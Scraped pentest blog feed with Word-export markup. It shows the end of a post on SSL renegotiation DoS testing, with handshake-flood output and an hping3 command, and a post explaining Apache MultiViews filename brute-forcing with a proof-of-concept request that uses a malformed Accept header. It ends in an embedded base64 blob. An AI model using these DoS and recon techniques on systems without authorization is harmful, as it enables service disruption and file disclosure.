<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:6.0pt;
mso-para-margin-right:0cm;
mso-para-margin-bottom:6.0pt;
mso-para-margin-left:1.0cm;
text-align:justify;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-ansi-language:EL;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="background: yellow; font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; mso-highlight: yellow; text-transform: uppercase;">host:xxx.xxx.xxx</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="background: yellow; font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; mso-highlight: yellow; text-transform: uppercase;">Handshakes 0 [0.00 h/s], 1 Conn,
0 Err</span><span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;"></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 44 [43.48 h/s], 16 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 118 [71.32 h/s], 25 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 193 [76.69 h/s], 32 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 290 [99.53 h/s], 38 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 371 [79.16 h/s], 43 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 459 [89.97 h/s], 48 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 545 [87.55 h/s], 52 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 632 [84.57 h/s], 56 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 728 [96.96 h/s], 60 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 819 [91.05 h/s], 63 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 913 [95.76 h/s], 66 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 989 [76.02 h/s], 70 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 1086 [96.98 h/s], 73 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 1165 [78.37 h/s], 77 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 1264 [97.87 h/s], 81 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">…[omitted]…</span></b></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 3642 [89.20 h/s], 144 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 3738 [92.35 h/s], 146 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 3828 [92.36 h/s], 148 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 3919 [93.75 h/s], 149 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4003 [83.73 h/s], 151 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4099 [90.18 h/s], 153 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4197 [105.10 h/s], 155 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4288 [90.83 h/s], 157 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4379 [88.02 h/s], 159 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4468 [88.77 h/s], 160 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4568 [95.30 h/s], 162 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4649 [87.94 h/s], 164 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4743 [89.97 h/s], 166 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;">Handshakes 4844 [106.67 h/s], 167 Conn, 0 Err</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="background: yellow; font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; mso-highlight: yellow; text-transform: uppercase;">Handshakes 4930 [81.71 h/s], 169
Conn, 0 Err</span><span lang="EN-US" style="font-size: 9.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 10.0pt; text-transform: uppercase;"></span></div>
<br />
<br />
<u>Hping3 output</u><br />
<br />
<span style="font-size: x-small;"> hping3 -T -p 443 xxx.xxx.xxx</span><br />
<span style="font-size: x-small;"><br />HPING xxx.xxx.xxx (eth1 xxx.xxx.xxx): NO FLAGS are set, 40 headers + 0 data bytes<br />hop=1 TTL 0 during transit from ip=xxx.xxx.xx. name=xxx<br />hop=1 hoprtt=0.6 ms<br /><b>...[omitted]...</b><br />--- xxx.xxx.xxx hping statistic ---<br /><span style="background-color: yellow;">10 packets transmitted, 15 packets received, 0% packet loss</span></span><br />
<b>Conclusion</b><br />
<br />
Running point and click hacking tools for testing for Symmetric DoS vulnerabilities should not be a taboo. If this is done then there zero doubt that this specific vulnerability can be exploited e.g. the sys admin can use stress test tools to record the performance of the server etc. <b> </b> <br />
<br />
<b>References:</b><br />
<br />
<ul>
<li><a href="https://www.thc.org/">https://www.thc.org/</a></li>
<li><a href="https://tools.ietf.org/html/rfc5746">https://tools.ietf.org/html/rfc5746</a></li>
<li><a href="http://stackoverflow.com/questions/16909409/how-can-i-solve-the-qualys-apache-partial-http-request-denial-of-service-vulnera">http://stackoverflow.com/questions/16909409/how-can-i-solve-the-qualys-apache-partial-http-request-denial-of-service-vulnera</a></li>
</ul>
<br /><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-1089095066927881722015-02-16T04:56:00.001-08:002015-02-17T07:00:52.274-08:00Apache mod_negotiation or MultiViews filename bruteforcing<span lang="EN-US"><span style="font-family: Calibri, sans-serif;"><span style="font-size: 14.6666669845581px;"><b>Filename</b></span></span><b><span style="font-family: Calibri, sans-serif;"><span style="font-size: 11pt;"> </span><span style="font-size: 14.6666669845581px;">Brute-forcing</span><span style="font-size: 11pt;"> through MultiViews Vulnerability</span></span></b></span><br />
<br />
<br />
<div style="text-align: justify;">
This is a small post about a way to easily get backup files on Apache web servers with Multiviews option enabled. There is no much information in Multiviews (an Apache feature) and some Web Application scanners report this as Apache mod_negotiation filename brute-forcing rather than Multiviews option enabled. Apache HTTPD supports content negotiation as described in the HTTP/1.1 specification (see <a href="http://www.w3.org/Protocols/rfc2616/rfc2616.html">http://www.w3.org/Protocols/rfc2616/rfc2616.html</a>). It can choose the best representation of a resource based on the browser-supplied preferences for media type, languages, character set and encoding. It also implements a couple of features to give more intelligent handling of requests from browsers that send incomplete negotiation information.<br />
<br />
<b>What are resources</b></div>
<br />
A resource is a conceptual entity identified by a URI (RFC 2396). An HTTP server like Apache HTTP Server provides access to representations of the resource(s) within its namespace, with each representation in the form of a sequence of bytes with a defined media type, character set, encoding, etc. Each resource may be associated with zero, one, or more than one representation at any given time. If multiple representations are available, the resource is referred to as negotiable and each of its representations is termed a variant. The ways in which the variants for a negotiable resource vary are called the dimensions of negotiation.<br />
<br />
<b>Negotiation in httpd</b><br />
<div>
<div>
<div>
<br /></div>
<div>
In order to negotiate a resource, the server needs to be given information about each of the variants. This is done in one of two ways:</div>
<div>
<ul>
<li>Using a type map (i.e., a *.var file) which names the files containing the variants explicitly, or</li>
<li>Using a 'MultiViews' search, where the server does an implicit filename pattern match and chooses from among the results.</li>
</ul>
<b>Using MultiViews to brute-force files</b><br />
<br />
<div style="text-align: justify;">
MultiViews is a per-directory option, meaning it can be set with an Options directive within a <Directory>, <Location> or <Files> section in httpd.conf, or (if AllowOverride is properly set) in .htaccess files.<br />
<br /></div>
<div style="text-align: justify;">
The effect of MultiViews is as follows: if the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.</div>
<br />
MultiViews is an Apache option which acts with the following rules:</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<i>"if you request from the server a file e.g. /some/dir/foo and does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client </i><i><i>had asked for one of them by name. It then chooses the best match to the client's requirements."</i></i></div>
<br />
<b>Impact</b><br />
<br />
An attacker can use this functionality to aid in finding hidden file processes on the directory and potentially gather further sensitive information through the mod_negotiation module. mod_negotiation is an Apache module responsible for selecting the document that best matches the clients capabilities, from one of several available documents. If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker to learn more about his target, for example, generate a list of base names, generate a list of interesting extensions, and look for backup files and so on.<br />
<br />
<b>Proof Of Concept </b><br />
<br />
<b>Example 1:</b><br />
<br />
<b>Request:</b><br />
<table cellpadding="0" cellspacing="0" style="width: 100%px;"><tbody>
<tr><td><div>
<div class="MsoNormal" style="margin-left: 0cm;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">GET
<span style="background: yellow; mso-highlight: yellow;">/mymanual/de/glossarry.html</span>
HTTP/1.1<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Host: <o:p></o:p></span><span style="font-size: 13.3333330154419px;">xxx.xxx.xxx.xxx</span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Accept:
application/xxx; q=1.0<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Negotiate:*<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">User-Agent:
xxx<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Connection:
close<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Referer:
http://xxx.xxx.xxx.xxx/test/se/<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-size: 11.0pt;">Cookie:
LangID=2; PHPSESSID=xxxx<o:p></o:p></span></div>
</div>
<!--[if !mso]--></td>
</tr>
</tbody></table>
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><b><br /></b></span></span>
<span lang="EN-US" style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><span lang="EN-US" style="font-size: 11pt;"><v:shapetype coordsize="21600,21600" id="_x0000_t202" o:spt="202" path="m,l,21600r21600,l21600,xe">
<v:stroke joinstyle="miter">
<v:path gradientshapeok="t" o:connecttype="rect">
</v:path></v:stroke></v:shapetype><v:shape fillcolor="#d9d9d9" id="Text_x0020_Box_x0020_26" o:gfxdata="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
